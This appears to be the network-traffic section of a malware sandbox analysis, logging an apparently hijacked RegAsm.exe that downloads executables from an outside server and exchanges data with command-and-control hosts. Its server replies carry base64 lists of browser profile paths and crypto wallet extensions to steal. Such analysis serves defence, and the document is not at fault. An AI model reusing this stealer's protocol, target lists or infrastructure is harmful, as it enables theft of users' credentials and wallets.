                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:38 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449740147.45.44.104804960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 29, 2024 22:52:35.191853046 CEST92OUTGET /prog/66d0cd8fb6f7b_lgjfd.exe HTTP/1.1
                                                      Host: 147.45.44.104
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:35.838202000 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:35 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 328744
                                                      Last-Modified: Thu, 29 Aug 2024 19:35:43 GMT
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=120
                                                      ETag: "66d0cd8f-50428"
                                                      X-Content-Type-Options: nosniff
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 cd d0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d2 04 00 00 0a 00 00 00 00 00 00 ae f1 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 fe 11 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 f1 04 00 53 00 00 00 00 00 05 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 de 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 20 f0 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf @ @`XS.(& H.text `.rsrc.@@.reloc @BHxSac?6UCMf'<soo<CqwNeie4+R1brIUU<N|cVGH$&~+<38tR]Bz4-oC{{9x0wI7_;!'qU?`/+,PM8}3j$Y=2)W]t*Z>g2i-I[wuha3Q*y=c2nQJ>=fwE-`/'g$1sW
                                                      Aug 29, 2024 22:52:35.838222027 CEST1236INData Raw: 02 97 d5 cd e2 d9 91 d2 af fd 6c b8 f0 19 18 c2 53 df 7f 3e cf 61 01 af 8e f6 18 67 9b 68 15 a6 7a 4b 96 14 d0 ee 81 e5 94 e2 14 5f 6f 42 33 25 16 63 ca 5a 93 29 56 d7 90 67 67 aa 11 5f b8 fe 30 1f ad 1c 3b 3c 66 1b fb be e9 41 d1 9e 94 cb 0a 25
                                                      Data Ascii: lS>aghzK_oB3%cZ)Vgg_0;<fA%RY7x#=|X+|(K2D,=UZH*B??Y}`49GFP)B[\*WKNc-9g+ $_6yp,z
                                                      Aug 29, 2024 22:52:35.838232994 CEST248INData Raw: ff 3f a3 af a4 fc ad ae dd a0 0f d0 2f 73 62 bb 6d d4 d2 40 a7 b1 d5 c7 68 e4 1e f5 cf 8b 3f 66 2e 7f 45 37 7e b1 b7 04 6b 2d c5 3f a8 d2 26 b0 d7 ee 23 d0 e5 02 45 ae 54 6f 63 2c f5 29 a9 4f 02 39 13 e2 95 48 c2 35 26 92 35 1f 51 1b 8e 38 b6 8e
                                                      Data Ascii: ?/sbm@h?f.E7~k-?&#EToc,)O9H5&5Q8hzRw*qM2P8=M0{(XiiC8w[LtwR]5Axv(nSl~z]u:}ZqU,-Ry@[cjG0qx\A]TH,12K*"Q/2
                                                      Aug 29, 2024 22:52:35.838243961 CEST1236INData Raw: 86 32 91 f2 dd c9 3f b1 6d 98 a3 28 5b 70 e6 ec 50 3e ab 19 19 ec 59 5d 42 e0 bd d7 0f d1 b4 3e ec 31 7d 45 47 d9 39 a4 1b 4d 7d b5 c6 21 af b1 d9 e2 fe 89 d6 c0 cf db 8b d5 04 15 b4 1c f8 0c 55 ff 75 50 39 bf 63 54 53 03 02 09 c5 54 19 c4 cb ca
                                                      Data Ascii: 2?m([pP>Y]B>1}EG9M}!UuP9cTSTRg&c'gy\,a8GTq3e~i.5b18mrfmoUHuK-g3gQ1=`O(QPnHQgu'ZXf#j"c'pzN+/j(
                                                      Aug 29, 2024 22:52:35.838254929 CEST224INData Raw: 4a 1a af 4a af 36 a9 01 1c 7a b2 1e a2 54 47 8c 7a 2d 43 41 ba 98 38 64 55 e8 64 3b b5 2f ae ef dc 4d ce f1 ff cc 5b f7 69 13 cf 87 f7 2a 02 d8 a9 8c 72 6e a9 c3 ec 66 31 f7 44 80 19 0d b7 39 10 8a ab 7e f3 0f 62 d4 de 38 d6 06 de 4f 39 f8 d1 48
                                                      Data Ascii: JJ6zTGz-CA8dUd;/M[i*rnf1D9~b8O9HNu_IP///.^O5M6IHfc&$jEtBiTQ[71WD6tRD0$xvVOhJukUmR,ocFJ
                                                      Aug 29, 2024 22:52:35.838265896 CEST1236INData Raw: bb 62 87 c0 d0 fb 6d 31 91 03 ff 77 c8 d8 05 4b 8e cb e6 03 af 8e cc 83 5c ba 9d 05 dd 2c 6b e3 30 67 54 d0 ff e4 2b 9f 6f 8f 41 70 18 25 cb d9 10 d7 ed 44 e2 b3 9f 0e f8 09 14 d4 7f d6 8b 39 4b cf 65 e1 3f e2 ea 1d 7d ac 00 81 2c 22 bf 3e 50 cc
                                                      Data Ascii: bm1wK\,k0gT+oAp%D9Ke?},">P[>vz25$*:'2G4b .}9~6#m<1&tK`7v40Etcyf,q9QWmnj$>d-hra%NsxMg>A
                                                      Aug 29, 2024 22:52:35.838274002 CEST224INData Raw: 51 27 98 b1 18 dc 80 9e 47 62 14 8a 5b 34 e6 87 99 70 26 25 1d 32 ee 2d d0 b7 31 18 a0 78 e3 3b 07 41 e4 30 f5 08 e9 ed cd d2 19 16 92 11 15 06 12 5b 75 6a 43 bc eb a6 d9 f0 0b ee 35 89 b4 ba d5 46 44 c7 74 5e 54 f5 01 53 71 32 9a 63 b8 f0 02 63
                                                      Data Ascii: Q'Gb[4p&%2-1x;A0[ujC5FDt^TSq2ccyU=g O&f~'$}N!WAfF`Is*gllP2fw'bmOzz%gPG_J|&']&nd:6c
                                                      Aug 29, 2024 22:52:35.838285923 CEST1236INData Raw: e6 94 71 85 23 ef 31 3c 52 3a 95 5a f2 87 7f b9 48 e0 09 42 47 2c 01 34 a4 b1 6d 6e e9 27 cf 3b e5 23 55 48 9e bf 32 bc 1e e4 6b 66 a6 0b db ed b1 90 2c c2 4e e0 58 5b 12 76 20 b3 d6 2c a3 05 9b a6 f6 58 71 7b 01 fa c5 62 79 90 b5 a7 6e 78 71 67
                                                      Data Ascii: q#1<R:ZHBG,4mn';#UH2kf,NX[v ,Xq{bynxqgg>${,u,Xb*YM07a5Y^V)=0|0_'yb@rLy\3/qX*lf+&I_9F@<2>r=LJLI\r7)
                                                      Aug 29, 2024 22:52:35.838296890 CEST224INData Raw: 77 e0 94 99 2d 02 78 57 4b 2a a2 ad ed 6a 65 d6 c3 42 ca b9 10 23 9b 44 bf 4b b9 8b 8a 6d 01 be ac 92 a3 90 fe f3 3e 63 bd ce 3a 21 44 5b 3c 02 97 7b d9 e9 a3 96 5e c9 7b bd 3a c3 0a 60 8c 57 52 7b a2 07 51 97 32 9f 49 3a 25 0f c2 a1 1e 2a c7 f8
                                                      Data Ascii: w-xWK*jeB#DKm>c:!D[<{^{:`WR{Q2I:%*`#5\R1mO"Ol,OMw1T}*^Z$xB -+!qI6~-15h)0 d_^D,\J'E
                                                      Aug 29, 2024 22:52:35.838306904 CEST1236INData Raw: 56 1d 13 b2 b1 f8 87 6f a1 78 73 7a 70 9d 04 79 35 2d 14 bf f1 ab c5 6b 0d 87 2b e1 4a a4 1c 21 13 53 2f 9c 12 14 2b 9e af f6 e2 d3 57 b6 d6 81 bb 82 b1 47 c5 0d d9 ed 9e 5e 6d 8e 6f a0 b1 e5 c1 7e 9f 5f cc fd a1 b5 9d a3 62 82 5d 28 3d 7a 51 35
                                                      Data Ascii: Voxszpy5-k+J!S/+WG^mo~_b](=zQ5/}uh};mY-0riYM[Nx}^M[.:$gP\m&^]sQWSHN>xwy$A-SzY1qoSG/
                                                      Aug 29, 2024 22:52:35.844100952 CEST1236INData Raw: 44 d2 58 55 0e eb f5 56 f5 99 7c b8 8c f2 9d a5 a1 7d ab 43 45 8e 4c 09 17 c7 a9 3b 78 19 c4 b0 6f 3d 29 68 24 84 b9 cd 9d 35 9d 63 e8 f5 15 4f 25 8d a1 88 3c 78 a5 a9 9a ba 53 c3 12 38 d2 5d b6 3c aa 4d 9b ee d4 16 e9 f3 a8 87 27 a4 81 b9 95 86
                                                      Data Ascii: DXUV|}CEL;xo=)h$5cO%<xS8]<M'IyR\}WU]kxH/z8/sHv5go7(sDsXLMSVjD(5AUB-X:wyF'Pb^G
                                                      Aug 29, 2024 22:52:37.215298891 CEST94OUTGET /prog/66d0cd9a65b5d_vqwergf.exe HTTP/1.1
                                                      Host: 147.45.44.104
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:37.402312994 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:37 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 196648
                                                      Last-Modified: Thu, 29 Aug 2024 19:35:54 GMT
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=120
                                                      ETag: "66d0cd9a-30028"
                                                      X-Content-Type-Options: nosniff
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee cc d0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ce 02 00 00 0a 00 00 00 00 00 00 ae ed 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 4e 2c 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ed 02 00 53 00 00 00 00 00 03 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 da 02 00 28 26 00 00 00 20 03 00 0c 00 00 00 20 ec 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf @ @N,`XS.(& H.text `.rsrc.@@.reloc @BHxR&(,XUfh&\=E%"=m?*<UHft$U!B#:dE\J19KlXGRA6|^.o@&5:i XmXj_0"LXEO j%mnEcT%3C))^:Tn7wY.`[AtyNjs|QT?9':l${&V}9nes[?wqR/_JU8ir_Rhy<<@/'-Uv8F2zU'q5,.+GE?@@!


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.44974495.164.119.162804960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 29, 2024 22:52:39.163593054 CEST190OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKK
                                                      Host: stadiatechnologies.com
                                                      Content-Length: 5777
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:39.163623095 CEST5777OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32
                                                      Data Ascii: ------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------CFCFCAAAAFBAKE


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449751147.45.68.138802896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 29, 2024 22:53:01.661441088 CEST88OUTGET / HTTP/1.1
                                                      Host: 147.45.68.138
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:53:02.579818010 CEST168INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:53:02 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0
                                                      Aug 29, 2024 22:53:02.582377911 CEST436OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE
                                                      Host: 147.45.68.138
                                                      Content-Length: 256
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 35 37 31 39 37 39 41 44 45 32 33 39 32 34 36 39 36 33 33 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 2d 2d 0d 0a
                                                      Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="hwid"C4571979ADE23924696330-a33c7340-61ca------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------DAKJDHIEBFIIDGDGDBAE--
                                                      Aug 29, 2024 22:53:03.124488115 CEST232INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:53:03 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 3a1|1|1|1|24ebb61fa2561269400e7def790dee73|1|1|1|0|0|50000|10
                                                      Aug 29, 2024 22:53:03.270740986 CEST511OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJEC
                                                      Host: 147.45.68.138
                                                      Content-Length: 331
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a
                                                      Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="mode"1------CFHDBFIEGIDGIECBKJEC--
                                                      Aug 29, 2024 22:53:03.813849926 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:53:03 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 5a 70 64 6d 46 73 5a 47 6c 38 58 46 5a 70 64 6d 46 73 5a 47 6c 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 44 62 32 31 76 5a 47 38 67 52 48 4a 68 5a 32 39 75 66 46 78 44 62 [TRUNCATED]
                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfFZpdmFsZGl8XFZpdmFsZGlcVXNlciBEYXRhfGNocm9tZXxDb21vZG8gRHJhZ29ufFxDb21vZG9cRHJhZ29uXFVzZXIgRGF0YXxjaHJvbWV8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxCcmF2ZXxcQnJhdmVTb2Z0d2FyZVxCcmF2ZS1Ccm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZXxcTWljcm9zb2Z0XEVkZ2VcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBDYW5hcnl8XE1pY3Jvc29mdFxFZGdlIFN4U1xVc2VyIERhdGF8Y2hyb21lfE1pY3Jvc29mdCBFZGdlIEJldGF8XE1pY3Jvc29mdFxFZGdlIEJldGFcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBEZXZ8XE1pY3Jvc29mdFxFZGdlIERldlxVc2V [TRUNCATED]
                                                      Aug 29, 2024 22:53:03.813894033 CEST486INData Raw: 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 52 55 55 4a 79 62 33 64 7a 5a 58 4a 38 58 46 52 6c 62 6d 4e 6c 62 6e 52 63 55 56 46 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57
                                                      Data Ascii: VXNlciBEYXRhfGNocm9tZXxRUUJyb3dzZXJ8XFRlbmNlbnRcUVFCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q3J5cHRvVGFiIEJyb3dzZXJ8XENyeXB0b1RhYiBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8T3BlcmF8XE9wZXJhIFNvZnR3YXJlfG9wZXJhfE9wZXJhIEdYfFxPcGVyYSBTb2Z0d2FyZXxvcGVyYXxPcGVyYSB
                                                      Aug 29, 2024 22:53:03.903203964 CEST5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0
                                                      Aug 29, 2024 22:53:03.904429913 CEST511OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG
                                                      Host: 147.45.68.138
                                                      Content-Length: 331
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 2d 2d 0d 0a
                                                      Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="mode"2------IIDHJKFBGIIJJKFIJDBG--
                                                      Aug 29, 2024 22:53:04.443942070 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:53:04 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 32 6c 6f 62 32 5a 6c 59 33 77 78 66 44 42 38 4d 48 78 43 61 57 35 68 62 6d 4e 6c 51 32 68 68 61 57 35 58 59 57 78 73 5a 58 52 38 4d 58 78 6d 61 47 4a 76 61 47 6c 74 59 57 56 73 59 6d 39 6f 63 47 70 69 59 6d 78 6b 59 32 35 6e 59 32 35 68 63 47 35 6b [TRUNCATED]
                                                      Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3wxfDB8MHxCaW5hbmNlQ2hhaW5XYWxsZXR8MXxmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHwxfDF8MHxZb3JvaXwxfGZmbmJlbGZkb2Vpb2hlbmtqaWJubWFkamllaGpoYWpifDF8MHwwfENvaW5iYXNlfDF8aG5mYW5rbm9jZmVvZmJkZGdjaWpubWhuZm5rZG5hYWR8MXwwfDF8R3VhcmRhfDF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDF8aVdhbGxldHwxfGtuY2NoZGlnb2JnaGVuYmJhZGRvampubmFvZ2ZwcGZqfDF8MHwwfFJvbmluV2FsbGV0fDF8Zm5qaG1raGhta2Jqa2thYm5kY25ub2dhZ29nYm5lZWN8MXwwfDB8TmVvTGluZXwxfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENsb3ZlcldhbGxldHwxfG5obmtia2dqaWtnY2lnYWRvbWtwaGFsYW5uZGNhcGprfDF8MHwwfExpcXVhbGl0eVdhbGxldHwxfGtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufDF8MHwwfFRlcnJhX1N0YXRpb258MXxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnwxfGRta2FtY2t